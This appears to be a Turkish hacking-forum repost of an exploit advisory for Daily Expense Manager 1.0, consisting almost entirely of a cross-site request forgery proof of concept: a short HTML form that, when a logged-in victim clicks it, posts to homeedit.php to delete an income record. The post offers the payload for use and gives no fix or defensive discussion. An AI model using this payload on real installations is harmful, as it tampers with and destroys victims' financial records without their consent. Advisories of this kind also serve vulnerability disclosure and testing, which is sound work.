Hoşgeldin Misafir

Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income) Vulnerability

NasyoneL

NasyoneL

Karanlık Özgürlüktür
25 Ağu 2017
25,060 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: [email protected]
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS
 
 
# PoC:
 
<html>
<body>
        <form action="http://server/homeedit.php?delincome=778" method="post">
                <input type="submit" value="Click!" />
        </form>
</body>
</html>
 
#  0day.today [2019-08-10]  #